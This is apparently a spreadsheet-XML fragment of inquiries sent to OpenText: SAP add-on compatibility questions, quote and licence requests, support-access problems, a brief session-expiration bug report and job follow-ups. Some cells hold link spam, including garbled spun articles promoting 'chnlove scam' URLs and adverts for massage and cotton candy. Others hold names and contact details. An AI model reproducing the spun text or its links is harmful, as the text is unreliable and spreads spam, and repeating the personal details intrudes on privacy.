OTBCSL00                      0700_003  0001      _x000D_
OTBCSL03                      0700_003  0001      _x000D_
OTBCSL30                      0700_003  0001      _x000D_
OTBCSL33                      0700_003  0001      _x000D_
OTBCWSR                       0740_003  0001_x000D_
_x000D_
According to SAP Notes we read VIM 16.3 is mandatory for S/4HANA 1709 and only Business Center 16.3 Addons are supported with VIM 16.3 _x000D_
_x000D_
Which would mean the following addons _x000D_
_x000D_
Business Center Addon - OpenText	OTBCBAS		16.3 (0700_004)_x000D_
Business Center Addon - OpenText	OTBCFND		16.3 (0700_004)_x000D_
Business Center Addon - OpenText	OTBCINB		16.3 (0700_004)_x000D_
Business Center Addon - OpenText	OTBCSL00	16.3 (0700_004)	_x000D_
Business Center Addon - OpenText	OTBCSL30	16.3 (1610_104)	_x000D_
Business Center Addon - OpenText	OTBCWSR		16.3 (0740_004)_x000D_
_x000D_
The following two addons are not listed in teh VIM 16.3 installation guides. Can you suggest if they are supported on S/4HANA 1709_x000D_
_x000D_
Business Center Addon - OpenText	OTBCSL03	0700_003	1_x000D_
Business Center Addon - OpenText	OTBCSL33	0700_003	1		_x000D_
_x000D_
_x000D_
If they are not supported, could you list the supported versions of the respective addons._x000D_
_x000D_
Regards,_x000D_
Kiran_x000D_
</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I am assisting a North America customer with their S/4HANA implementation._x000D_
_x000D_
They are going from ECC 6.0 EHP7 to S/4HANA 1605. _x000D_
_x000D_
They have the following Business Center Addons installed and we would confirmation if all of them are supported on S/4HANA simple Finance 1605 _x000D_
_x000D_
_x000D_
Addons : _x000D_
_x000D_
OTBCBAS                       0700_003  0001_x000D_
OTBCFND                       0700_003  0001_x000D_
OTBCINB                       0700_003  0001_x000D_
OTBCSL00                      0700_003  0001      _x000D_
OTBCSL03                      0700_003  0001      _x000D_
OTBCSL30                      0700_003  0001      _x000D_
OTBCSL33                      0700_003  0001      _x000D_
OTBCWSR                       0740_003  0001_x000D_
_x000D_
_x000D_
_x000D_
They also have the ADA &amp; exetended ECM solution implemented. Could you also confirm that they are supported on 1605 _x000D_
_x000D_
OTEXBAS                       1050_700  0001_x000D_
OTEXERP                       1050_600  0000_x000D_
OTEXRL                        1050_700  0001_x000D_
_x000D_
If they are not supported, could you list the supported versions of the respective addons._x000D_
_x000D_
Regards,_x000D_
Kiran</t>
  </si>
  <si>
    <t>UNESCO society discussion on school needed for environmentally friendly pattern_x000D_
_x000D_
the environmental, money and then social signs reveal our contemporary type of expansion must be not sustainable. mine is an enormous amount of emerging worries and moreover significantly short amount of money. pleasant engineering provides the best thrill to adjust our plan. (n't assistant normal prohibit Ki silent celestial body)_x000D_
_x000D_
the most important (ESD) can be company well organized in 2014 just by united nationsESthe government and japan of additional hand reason the finish of a good education of the for the purpose of Decade of lasting creativity. It has [url=http://www.chnlovescam.com/]chnlove[/url] this approach four targets:_x000D_
_x000D_
The 2014 globally expo on coaching at environmentally safe creation shall practice a stock agreeing to [url=https://chnlovereview.wixsite.com/chnlovereview]chnlove scam[/url] together with the inclusion n't Decade of (DESD) and so commemorate generally Decade's successes. your current summit may possibly accentuate work, famous actors, cpa networks furthermore views that were positive by your DESD. degrees of good practice within world wide can play a huge role in deciding fantastic ways to understanding with regard to self-sufficient engineering (ESD), plus most important parts of in prolonged term proceeding._x000D_
_x000D_
obtaining your internet Bonn record with 2009, The national gathering would certainly remove the significance of ESD to aims to improve products you can tutoring. It will highlight the identity on ESD in order to transition to natural green economies and societies and as a driver for combination world preparing and implementation workshops fields in for instance climate change, Biodiversity moreover problem opportunity cutback. it will likewise target recommendations on how ESD can guide safe growing policies and simply activity forward to meet various worldwide, regional, nationalized, and thus the nearest [url=http://chnlovescamornot.trip</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-- _x000D_
_x000D_
_x000D_
Hey ,_x000D_
_x000D_
I found Security Vulnerability in your web application ,which can damage site as well as users too.For security purpose can we report vulnerability here,then will i get bounty bounty reward in PayPal or Bitcoin for Security bug ?_x000D_
_x000D_
_x000D_
_x000D_
Thanks,_x000D_
Shubham_x000D_
Independent Security Resercher_x000D_
INDIA</t>
  </si>
  <si>
    <t>Invoice 5775 to OpenText is 58 days past due. We have tried emailing appaymentinquiries@opentext.com in regards to a stop payment on their check if it was sent and to pay via ACH with our banking information that I've also sent before to the same email address.   When I called, I wasn't given the direct line to talk to anyone in AP.  Please help as we need to get paid. _x000D_
Thanks,_x000D_
Chi</t>
  </si>
  <si>
    <t>Dear Sir/ Madam;_x000D_
We are a startup company in Toronto  and requiring an App Development with a degree of customization for mobile devices+web in a secure environment with cloud at the back end. Would you kindly contact me at your earliest to further discuss how and when you would be able to support the development required, and at what cost._x000D_
I look forward to connecting with you . _x000D_
Regards,_x000D_
Charles E.</t>
  </si>
  <si>
    <t>Support contract for a rightfax express</t>
  </si>
  <si>
    <t>Following up on my previous outreach. Kern County (California) is requesting proposals for web hosted content management systems and would like to invite OpenText. You can contact me for more information or access the RFP directly through the county website under "general services" &gt; "purchasing" &gt; "RFPs (Requests for Proposal)"</t>
  </si>
  <si>
    <t>Hello,_x000D_
I would like to request a password reset for the following userid: missiontradingco_x000D_
_x000D_
Thanks, _x000D_
Sameer</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
Business Owners/C-level executives’ lead lists are available _x000D_
_x000D_
Please reach us with your Target industry/Job titles and Geography; to get quote and sample contacts._x000D_
_x000D_
Last update: May 25th, 2018 _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Marcus Ford</t>
  </si>
  <si>
    <t>I need to link my account with our support contract. Contract # 0012242009_x000D_
Server ID 55433-12203</t>
  </si>
  <si>
    <t xml:space="preserve">Procurement of the MDM open-text  tool and possible partnership </t>
  </si>
  <si>
    <t xml:space="preserve">To the Head of the Marketing/Strategy Team,_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
We have published a report on Global Customer Experience Management (CEM) Market Size and Analysis - Forecasts to 2025._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report or may be a live demonstration with the analyst team._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Best Regards!_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Customer request I quote this item, please advise:_x000D_
_x000D_
"(4) additional "channels" to our Rightfax server We use Rightfax Enterprise Server, version 10.60 (w/ FP 1 SR 2)"</t>
  </si>
  <si>
    <t>Delphi company ,_x000D_
Unable to access to my support _x000D_
where to download Archive server 10.5</t>
  </si>
  <si>
    <t>There are two employees interested in the course: 3-0188 OpenText Content Server System Administrator v16.2. This course will take place on June 11, 2018._x000D_
I would like to know if  they can take the course in a classroom instead of a virtual classroom_x000D_
Jun 11, 2018</t>
  </si>
  <si>
    <t xml:space="preserve">We had a call before and agreed that somebody will follow-up with me but no one did </t>
  </si>
  <si>
    <t>To the Head of the Marketing/Strategy Team, _x000D_
_x000D_
We have published a market research report on The Worldwide Electronics Manufacturing Services Market- Forecasts to 2025._x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report.</t>
  </si>
  <si>
    <t>Need Support For system upgrade</t>
  </si>
  <si>
    <t>Sourcing for a Content Management Software</t>
  </si>
  <si>
    <t>I Need to explore posiible options for integrating with your Sentiment Analysis engine with our solution.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
I hope you’re well - I work with Kent Police and Essex Police and currently trying to renew a Digital Forensics Licence. We believe the Licence was with “Guidance” and from my research on Companies House, it appears that “Guidance” is now acquired by your organisation, OpenText._x000D_
_x000D_
We were wondering if we could renew the Licence for Annual Encase Forensic V8 Standard for both Kent Police and Essex Police. We had a search on the G Cloud 9 framework but, we cannot find the correct Licence. I have attempted to e-mail Gideon Jones who is a listed contact but, he has yet to reply. _x000D_
_x000D_
We would appreciate it some direction to a purchase route for this existing Licence as it is due to expire in June. _x000D_
_x000D_
Many thanks,_x000D_
Nadia _x000D_
</t>
  </si>
  <si>
    <t>The activation link isn't working, and when I try to activate the account using the instruction the link for activation at the bottom of the screen is missing</t>
  </si>
  <si>
    <t>I would like to attend demos for SAPPHIRE NOW that will be held on June 5 to 7._x000D_
Please register me so that I can able to attend this. Thanks</t>
  </si>
  <si>
    <t>bagreczova.78@mail.ru</t>
  </si>
  <si>
    <t>Getting a below message even after confirming account two times:_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
Please click on the link below to complete the process_x000D_
_x000D_
Request Confirmation Email</t>
  </si>
  <si>
    <t>Hi, I just wanted to follow up if my profile applied for Technical Writer position is in process. When can I anticipate the information regarding the profile. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We have a pending request for your software for the University. We need a copy of at VPAT 2.1 report completed for the products “EnCase Basic software”. I've included a link below to a page that includes a template and instructions if you do not already have a VPAT 2.1 report for each of these products._x000D_
        _x000D_
www . itic . org / policy / accessibility_x000D_
        _x000D_
VPATs provide the potential buyer with your company's assessment of your product's accessibility. VPAT documents are based on the University accessibility standard, which combines Section 508 of the 1973 Rehabilitation Act and the World Wide Web Consortium's (W3C) Web Content Accessibility Guidelines (WCAG) 2.0._x000D_
        _x000D_
section508 . gov / content / sell / vpat_x000D_
        _x000D_
Hardware_x000D_
Section 508 Standards: 1194.25, 1194.26, 1194.31, 1194.41_x000D_
        _x000D_
Software (Standalone/Web)_x000D_
Section 508 Standards: 1194.21, 1194.22, 1194.31, 1194.41 Do you have video? If so, include 1194.24_x000D_
 </t>
  </si>
  <si>
    <t xml:space="preserve">The spa center japanese invites find out one of the ways massage, is what we do. The beautiful masseurs our the salon will give you an unforgettable experience. The spa is a place of rest and relaxation. _x000D_
 _x000D_
The room Hot Stone massage in Uptown _x000D_
considered best technique gain strength as a result of the strenuous workweek is Happy ending massage. _x000D_
Lovely way better comprehend in emotions and interests of a loved one - a common Happy ending massage, showing powerful stimulating effect. The skill Tantric massage in NY discovers freedom for experiments  in building deep feelings, besides this is exemplary tactics express love and appreciation sweetheart to man. _x000D_
 _x000D_
luxury Water-gel massage in Fort Worth from Temperamental the miss  the massage. Men can come to the erotic salon and get several types of massage. _x000D_
 _x000D_
Hannah from the Spa of the Anticellulite massage in Portland become will your own personal masseuse at any time. _x000D_
 _x000D_
 _x000D_
[url=https://tantric.massage-manhattan-club.com]tantric massage hot[/url] _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
 eDOCS Document Management (DM) Client v10.x   is on the listing of approved software for the Air Force.  I was interested in seeing a demo and possibly discuss how it can be used within my organization.</t>
  </si>
  <si>
    <t>I need assistance with uploading items to Open Text and am not having luck with the instructions available within the portal. Please have someone call me to discuss between 10a and 4p central.</t>
  </si>
  <si>
    <t>I have been informed you do not contract directly with companies for implementation of your systems. Is this the case? We have issued a request for quotation but been told you will not contract directly for implementation and that we can only contract with implementation partners. This is not what we require and other software providers have agreed to contract directly. We would be disappointed to lose Opentext as a serious bidder due to this rejection to contract directly. A confirmation from your end would be much appreciated.</t>
  </si>
  <si>
    <t>I would like to speak to some one regarding your email marketing app. EasyLink?</t>
  </si>
  <si>
    <t xml:space="preserve">I was wondering if you had a free trial </t>
  </si>
  <si>
    <t xml:space="preserve">•	SUID 50271-12184 Sean Roberts – Decommissioned but he is not an employee_x000D_
•	SUID 00276-12237 April 30th of 2019_x000D_
•	SUID 51475-12390 April 30th of 2019_x000D_
_x000D_
stlukes-stl_x000D_
_x000D_
232 S Woods Mill Rd_x000D_
Chesterfield, MO 63017_x000D_
_x000D_
Can you check the accuracy of the SUIDs listed for St. Luke's in Chesterfield, MO?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
We would like to build an intranet  on premise. Can you please advise if OpenText™ Web Site Management is the right product and what are the costs of purchasing the software/ license (are there any other costs involved)?_x000D_
Kind regards,_x000D_
Barbara Surowiecka</t>
  </si>
  <si>
    <t>I am looking for email service provider are you in business.</t>
  </si>
  <si>
    <t>Hello we are looking for the account page and download link for our recently purchased software. according to instructions we need to generate a license key file. the page to do this doesn't seem available to me. could you please contact me.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi , this is MrSqar .._x000D_
_x000D_
I found session takeOver [Insufficient Session Expiration] bug in your website _x000D_
1- first Log in to your account from 2 browsers [ firefox - chrome ] ._x000D_
now i'll login to my account from firefox_x000D_
2- now change your password from chrome (for example) or firefox_x000D_
Your profile has been updated_x000D_
_x000D_
3- come back to the another browser firefox , session will does not expire after password changed ..._x000D_
_x000D_
that could be risky factor for the user_x000D_
thank you ._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Information Governance employee questionnaire. I wish to interview our HR department on Information Governance but do not know what questions to ask or in what format they should be in order to understand what data we hold on our systems, how it is used, who has access to it, how it is disposed of ect so can you advise please._x000D_
_x000D_
Thank you_x000D_
_x000D_
Regards_x000D_
_x000D_
Mr M</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
L’équipe des communications graphiques de Loto-Québec est actuellement à la recherche d’un nouveau logiciel pour la gestion de leurs documents numériques (principalement des images et des photos). Nous avons plus de 10 000 documents à référencer. Voici un résumé de notre fonctionnement pour vous permettre de mieux comprendre notre besoin._x000D_
Nous archivons tous nos documents sur des serveurs locaux. Nous avons besoins d’un logiciel qui va permettre d’identifier et de repérer des documents qui seront archivés sur nos serveurs. Voici le genre de métadonnées avec lesquels nous archivons : Cote, Titre, Date du document, Date semi-active, Genre, Service, Requérant, Graphiste, Mots clés, Formats, Référence vers le document, une visualisation de l’image._x000D_
Pour l’instant, seul l’archiviste utilise le logiciel d’archivage, par contre si nous constatons que les fonctionnalités de collaboration sont pertinentes pour notre équipe d’environ 20 graphistes, il serait probable que nous l’installerons sur tous les postes._x000D_
Le logiciel est-il disponible en français? Peut-on avoir une estimation des prix?_x000D_
Merci,_x000D_
Patrick Lanteigne</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am assisting a colleague conducting research on potential fax solutions for a large department at Indigenous Services Canada (formerly Health Canada, First Nations and Inuit Health Branch).  Regarding your Rightfax product, I have just one question at this point, which could be a deal-breaker for us.  Does your solution support a French language option for the user interface?  I did not find this on your website, and would appreciate your response on this question, please. (E-mail would be fine.)_x000D_
_x000D_
Thank you,_x000D_
Brady_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Quotation request for 100 NFS Gateway License with 1 year maintenance, professional services to install the application, and training. </t>
  </si>
  <si>
    <t>The County of Kern IT Department is hosting a request for proposal for a web hosted content management system for Kern County's internet domains and websites, including implementation and migration services, with the option for ongoing support and development._x000D_
_x000D_
The department identified OpenCities as a potential vendor and would like to extend an invitation to apply. The deadline for application is June 18 at 11:00 a.m._x000D_
Please contact me for details.</t>
  </si>
  <si>
    <t>Regarding customer Fred Meyer/Kroger.  We need information on adding them to our existing connection with OpenText for 850, 810 &amp; 997 transactions</t>
  </si>
  <si>
    <t>Looking for commercial product for dynamic document generation.</t>
  </si>
  <si>
    <t>Need fax to hit multiple sites in a DEA-Compliant manner.</t>
  </si>
  <si>
    <t>Making money</t>
  </si>
  <si>
    <t xml:space="preserve">You are off to a pathetic start.  I have been using HighTail for years as a Subscriber.  I couldn't send my client urgent Audio Files earlier this week because HighTail - now your company - decided to update your Terms Of Service.  Without Notification or an easy way to figure out what the hell was going on - I was denied the ability to send my client his much needed files until I updated your Terms Of Service Agreement.  Again - with no advance warning or easy way to execute your demand!  This approach was immature, rude, inconsiderate, arrogant and amateur!  Get in Business or get the hell out! nuff said, Norm Woodel PS: I'am moving to FileShare. </t>
  </si>
  <si>
    <t xml:space="preserve">We are attempting to complete employment verification on a former employee from your company. Can you please provide us with contact information for the Human Resources department or the person in charge of completing the Employment Verifications in your company?_x000D_
_x000D_
If you have further questions you can contact us at 1-866-268-4740 and speak with anyone in verifications by using the reference number 000000. You can also reply to this email and copy VerificationsAudit@promesa.com._x000D_
</t>
  </si>
  <si>
    <t>Looking to find a better document management solution to integrate our Salesforce CRM and our O365/Sharepoint document library consisting of several thousand documents, allowing our users to continue to work natively in their preferred MS Office desktop clients but save and organize work within the context of Salesforce (without having to double/triple save documents, creating duplicates, orphaned versions, conflicts, etc). Drawback/full disclosure: we're a fairly small business trying to accomplish this on a limited budget (what else is new?). _x000D_
Thanks!</t>
  </si>
  <si>
    <t>I'm working with a government agency in California who is desperate to keep their analog fax machines (1200 of them) spread out across their locations, but are having issues with reliability and management.  Many of these fax machines are not capable of mfp.  I would like to find a way to use rightfax to enhance their fax management in the near term, and drive them to desktop faxing in the future.  My thought is to use analog lines to deliver faxes into rightfax, and have rightfax store, track, and relay them to the destination over the pstn, or rightfax connect.  We have a broader opportunity at this client to offer a hosted collaboration solution (most likely Cisco).  Can you connect me with someone who can partner with us on this opportunity?_x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to learn more about your products and services. </t>
  </si>
  <si>
    <t>Job openings</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, my customer with the US federal Govt. needs me to provide a quote for the below items:_x000D_
_x000D_
	SW Maint Renwl for Exceed (1-4), per client, License# 50814-12473, VPS# RC323199; Qty=2; PoP: 11/1/2018 - 9/30/2019 (short PoP);_x000D_
	SW Maint Renwl for Exceed (100-199), per client, VPS# R113510-000, Part#: EXMPI550700M0000Z; Qty=13; PoP: 10/1/2018 - 9/30/2019;_x000D_
	SW Maint Renwl for Exceed (100-199), per client, VPS# V030293-000, Part#: EXMPi550701M0000Z-2; Qty=75; PoP: 10/1/2018 - 9/30/2019;_x000D_
	SW Maint Renwl for Secure Shell (10-99), per client, VPS# V030293-000, Part#: SPMPi570701M0000Z-1; Qty=50; PoP: 10/1/2018 - 9/30/2019;_x000D_
	SW Maint Renwl for Secure Shell (10-99), per client, VPS# V097463-000, Part#: SPMPi570701M0000Z-1; Qty=18; PoP: 10/1/2018 - 9/30/2019;_x000D_
	SW Maint Renwl for Exceed (10-99), per client, VPS# V112271-000, Part#: EXMPi550701M0000Z-1; Qty=10; PoP: 10/1/2018 - 9/30/2019;_x000D_
	SW Maint Renwl for Exceed (10-99), per client, VPS# V114576-000, Part#: EXMPi550701M0000Z-1; Qty=56; PoP: 10/1/2018 - 9/30/2019;_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, Could i please have a quotation in writing for one licence for Brava Desktop SX. Thank you </t>
  </si>
  <si>
    <t>Hi! For a reason I cannot access the knowledge base error: No Access_x000D_
We're sorry, your account does not grant you access to this resource. Almost there!_x000D_
I do the confirmation email and I still do not have access._x000D_
Regards, Joel</t>
  </si>
  <si>
    <t xml:space="preserve"> We have one web application for the human resources department. And _x000D_
We need a reporting tool as a company. we want to integrate the reporting tool into this application. I want to get information about your reporting tool. what is the price and is it suitable to embed my application.</t>
  </si>
  <si>
    <t>[url=https://vk.com/sladkaya_vata_na_prazdnik][img]http://dl3.joxi.net/drive/2018/05/19/0010/3895/683831/31/67441fa8fd.png[/img][/url] _x000D_
 _x000D_
Закажите аппарат для сахарной ваты с выездом к вам дополнительно к комплексной детской анимации на день рождения ребенка! При желании можно изготавливать вату и на продажу через розничные магазины. Это станет дополнительным источником прибыли. [url=https://vk.com/sladkaya_vata_na_prazdnik]аппарат сладкой ваты в аренду[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Our customer ID at OpenText is EU0178132. We need to buy an additional module (xmlout)  for StreamServe for which we don't a license yet. Could you please contact me by email or phone, please? </t>
  </si>
  <si>
    <t xml:space="preserve">Sales - need to obtain info about features within your system, as we surfing options to implement a new archiving solution at a bank in Jordan </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
I'm Monika from the BT Radianz team and I'm looking for a contact regarding Radianz services EasyLink/OpenText currently takes from us. My last contact person was John Mills._x000D_
_x000D_
Your reply is much appreciated. _x000D_
Kind regard,_x000D_
Monika Perepatics_x000D_
</t>
  </si>
  <si>
    <t>Please share the quote for one instance._x000D_
_x000D_
Regards,_x000D_
Mohammed</t>
  </si>
  <si>
    <t xml:space="preserve">Guten Tag _x000D_
_x000D_
Ich bin Berater bei HCM ADVICE, einem Beratungsunternehmen mit Hauptsitz in Wien, das auf SAP ERP HCM und SuccessFactors spezialisiert ist._x000D_
Aktuell möchte ein Kunde von uns seine Personalverwaltung auf SuccessFactors Employee Central umstellen und benötigt dafür auch ein System zur integrierten Verwaltung von HR-Dokumenten. _x000D_
Dabei ist mir openText eingefallen und ich wollte mich erkundigen, ob Sie Möglichkeiten für eine Partnerschaft anbieten, sodass wir Ihre Produkte bei unseren Kunden vorstellen/anbieten können bzw. welche Partnerschaftsmodelle Sie anbieten?_x000D_
_x000D_
Vielen Dank für Ihre kurze Rückmeldung und beste Grüße_x000D_
Joachim Kaiser_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I need to know about archiving system that you provide </t>
  </si>
  <si>
    <t>Hello _x000D_
Greetings for the day!!_x000D_
_x000D_
Allow me to congratulate you for the excellent work you have been doing in Customer communication space._x000D_
_x000D_
We are software re-sellers and working with a few telcom and BFSI players across regions. We want to pitch your solution to our existing clients, as what they are looking for is experience and quality. _x000D_
But before that we want to have a look at your capabilities, so if you can share your communication product presentation and a demo to start with then it would be good for us._x000D_
If you have a prerecorded demo then we can go through it as a pre-requisite before meeting face to face. _x000D_
Pls suggest._x000D_
_x000D_
Vineet_x000D_
Director-Sales</t>
  </si>
  <si>
    <t>Looking for online/offine course/training on OpenText AI workbench v5.3 EDi tool tool. Please let me know the training details</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
We have a need for an electronic personnel store to replace a solution for a recently acquired business and would be interested in extending this to other locations.  In parallel we are evaluating a move to SAP SuccessFactors currently we use SAP on premise HCM.  Would you be able to direct me to some relevant materials and possibly arrange a web demo in a couple of weeks time?_x000D_
P.S. To clarify my location - I live in UK but work for head office (Group HR) in Wiesbaden Germany.  Communication / presentations should be in English but it may be advantageous to have a German speaking representative available._x000D_
Thank you_x000D_
Simon Hallows</t>
  </si>
  <si>
    <t>Hello Open Text Team,_x000D_
I would like to get access to your knowledge base, because I work in the SAP field for Swisscom which touches also your software. Because there is not much information around Open Text, I would like to get access to more information directly by you. Can you please provide the necessary steps?_x000D_
Kind regards_x000D_
Marc</t>
  </si>
  <si>
    <t>Enquire about Captiva 7.1 software download and temporary licence for a free trial for a short period. Kindly let me know the details and the procedure for this. _x000D_
FYI. This is to be installed on my personal computer for a demo.</t>
  </si>
  <si>
    <t>Good Morning;_x000D_
Please i need list of Kuwait authorized dealer OpenText (File 360) product support and license sales contain telephone number and address._x000D_
Thank you_x000D_
Mohammed Kamal</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, sales_x000D_
This Wendy from Beijing Com&amp;Lan Tech. Corp., Ltd._x000D_
Our company is a professional and large software reseller in China. We serve for more than 10,000 customers and cooperate with more than 1,000 vendors._x000D_
Now one of our customer wants to buy Brava Desktop Concurrent TXL×10user_x000D_
I wonder whether we can make order online with our info and whether you may offer some discount to our company as a reseller._x000D_
I wonder whether you accept credit card and how you deliver the license, by email or other way._x000D_
_x000D_
Wait for your quick reply!_x000D_
</t>
  </si>
  <si>
    <t>what to attire_x000D_
_x000D_
brown wrap recommended: if this is located on a party invitation, friends and family members produce recommendations, fantastic? the true answer is yes, however,though as well as several recommendations being aware of here a similar. Ordonez told me black and white put suggested "typically refers to an official wedding and reception, so, The mature in the festivities will likely be decked out in tuxes. many men in a vacationing couple's surrounding loved ones could, furthermore. nevertheless prospects, on a other hand, Can be a bit more challenging. adult men may well opt for amazing, black colored lawsuits (during a african american, black colored dreary or navy blue dyes style). young ladies, in the meantime, may perhaps perhaps clothes working day outfits or perhaps a beverage garments. Ordonez conveys to people to be "Wear that which you'd wear on the black color connect consideration but never ured floor covering, couture garment,_x000D_
_x000D_
sand events: it's not hard to think sundresses and therefore flip flops due to this one, brand new wii console let the yellow sand and seashore fool individual. just because [url=https://prezi.com/ikjzh31sbmgv/reviews-on-chnlovecom-scam-fake/]chnlove scam[/url] it's a beachy wedding day, ensures that it is actually essential to dress to outstanding particularly when using the as few as a great choice elements of orange sand, salt water in addition to full light, cited Ordonez, which people shows that women consider using a "simple sundress" or maybe "Chiffon costume met the criteria sturdy which enable it to be paired with a thorough pop nicely relating to intelligent colored or possibly a womanly, flowery make, the actual way too declares [url=https://www.facebook.com/Chnlove-scam-471737819697545/]chnlove scam[/url] to stop a sheer non-renewable make use of flop as attractive as it might be and select different style of washboard perhaps a nice shoe accompanied by [url=https://www.dailymotion.com/chnlove_review]c</t>
  </si>
  <si>
    <t>General inquiries about compliance and all compliance areas in the organization</t>
  </si>
  <si>
    <t>Dear Hiring Manager, (Job. ref # 18734 &amp; ref. # 18373)_x000D_
_x000D_
I am kindly requesting for feedback on my application for the Senior Project Manager (Job ref. # 18734) and second priority application for Service Delivery Manager role (Job ref. # 18373).  I honestly see a very good fit in addressing Open Text's need for the role based on my current duties and responsibilities plus Open Text's other special requirements on work schedule and location preference. Please contact me for an interview at your earliest convenience. Thank you._x000D_
_x000D_
Nate Quita_x000D_
+63 935.334.8756 (mobile)_x000D_
Nate.Quita@outlook.com_x000D_
+63 2 740.6068 (business)</t>
  </si>
  <si>
    <t>We are looking for OpenText Exceed TurboX or on Demand. Our Lab in university is using EDA for IC design such as cadence, Synopsys, Mentor etc...</t>
  </si>
  <si>
    <t>I am seeking information to complete a security risk assessment to use Tempo Box to share information with another government agency.</t>
  </si>
  <si>
    <t>Hi_x000D_
We have the request of Gupta report builder_x000D_
But no any disti in Taiwan , How to buy it_x000D_
_x000D_
Regards,_x000D_
C.W.</t>
  </si>
  <si>
    <t>to inform me if i will be part of your prestigious company</t>
  </si>
  <si>
    <t>I had an account with Hightail and would like to continue using this service.  I was unable to sign up to do that. I am a court reporter employed by the Contra Costa Superior Court. Please advise what I need to do to get signed up.  Thank you very much,  Debra Eastridge</t>
  </si>
  <si>
    <t>I would like to learn more about your subscription packages. Thanks</t>
  </si>
  <si>
    <t>Hi there,_x000D_
I created my account using the customer account, but I want to move it to our Deloitte partner account so that I can access training and user guides.</t>
  </si>
  <si>
    <t>End User Code: EU0322929._x000D_
I need access to my support. _x000D_
_x000D_
Contract #A246160_x000D_
Invoice Date: 9/21/2017_x000D_
Invoice Number: 9000164198_x000D_
Customer PO Number: Invoice Form 09/2017_x000D_
End User Name: MI MONTREAL INFORMATICA SA_x000D_
End User Code: EU0322929_x000D_
Bill To Name: MI MONTREAL INFORMATICA SA_x000D_
Bill To Number: 10119005</t>
  </si>
  <si>
    <t>Who could I contact at Vignette regarding your off-site meetings that could possible consider Orange County, Southern California?</t>
  </si>
  <si>
    <t>Need registration key for desktop viewer. We currently have imagenation and need to download the latest version. We already received the link for the application but no registration key.</t>
  </si>
  <si>
    <t>[url=https://vk.com/sladkaya_vata_na_prazdnik][img]http://dl3.joxi.net/drive/2018/05/19/0010/3895/683831/31/67441fa8fd.png[/img][/url] _x000D_
 _x000D_
Аппарат для изготовления воздушного угощения, неограниченное количество порций сахарной ваты на любое число гостей, работа повара-кондитера в праздничной форме в белых перчатках, красном фартуке и веселым колпаком. Разноцветные палочки в цвет вашего мероприятия, расходные материалы для поддержания порядка и чистоты на станции выдачи сладкой ваты, доставка и установка необходимого оборудования за час до начала праздника, демонтаж и вывоз аппаратуры с площадки проведения торжества проводится с вашего разрешения. В запасе у кондитера всегда имеется дополнительные ингредиенты для создания цветной сладкой ваты и можно оформить лакомство в тематику вашего праздника. Сахарная вата может быть со вкусом клубники красного цвета, яблочного с зелёным оттенком и ежевичный вкус в синим цвете. При изготовлении сладкой используются, только качественные и сертифицированные продукты. Повар-кондитер на ярмарке, городских праздниках, народных гуляниях и все возможных концертов и фестивалей, всегда следит, чтоб предоставляемый нами продукт был свеж и вкусен. Все производство по изготовлению сладкой ваты ведется с соблюдением требований санитарно-гигиенической безопасности. Мы заинтересованы в перспективых, долгосрочных отношениях, поэтому уровень нашего обслуживания всегда остаётся на высочайшем уровне. Наша команда с огромным удовольствием организует на вашем празднике сладкий стол с мягким или итальянским мороженым, попкорном или сладкой ватой, мы дорожим своей репутацией и сможем достойно преподнести вашим гостям воздушные лакомства и сладкие угощения. [url=https://vk.com/sladkaya_vata_na_prazdnik]сладкая вата праздник[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Would you be interested in having Sapphire Now 2018 attendee list? I wanted to find out if you are looking for Sapphire Now 2018 attendee list to drive traffic to your booth and capture qualified leads._x000D_
Our Sapphire Now 2018 attendee list can help you to create a focused outreach to key decision makers and improve your campaign response rate as well as conversion._x000D_
Would you be interested in acquiring the potential attendee list? Our list comes with Company Name, Website Address, Physical Address, Contact Name, Title, Phone number, Fax number, SIC Code, Industry Vertical, Revenue Size, Employee size and verification result for every individual contact._x000D_
_x000D_
Shall I have my sales team get in touch for pricing details and more information? We’re happy to assist you._x000D_
</t>
  </si>
  <si>
    <t>Review Account. Please don't ask for any information, because I don't have any. last contact was from 2015 , Alex Kohler... who no longer works there?</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Ma’am_x000D_
I am a graduate student in the Department of Industrial and Systems Engineering at Rutgers University. I am currently conducting a research study on Supply Chain Control Towers as an associate with the Supply Chain Disruption Research Laboratory at Rutgers under Dr Arash Azadegan, Associate Professor, Supply Chain Management, Rutgers Business School. Given that your organization is engaged in providing Supply Chain solutions, I would like to discuss your views /practical insights on control towers. I would be grateful if I could get an opportunity to meet someone from your team in this regard. This will be really helpful for my project._x000D_
Regards,_x000D_
Faizal Ahmed_x000D_
</t>
  </si>
  <si>
    <t>I need access to MySupport similar to what Eric Fuehrer with Wells Fargo already has access to. I have been unsuccessful in getting after I did confirmation email steps</t>
  </si>
  <si>
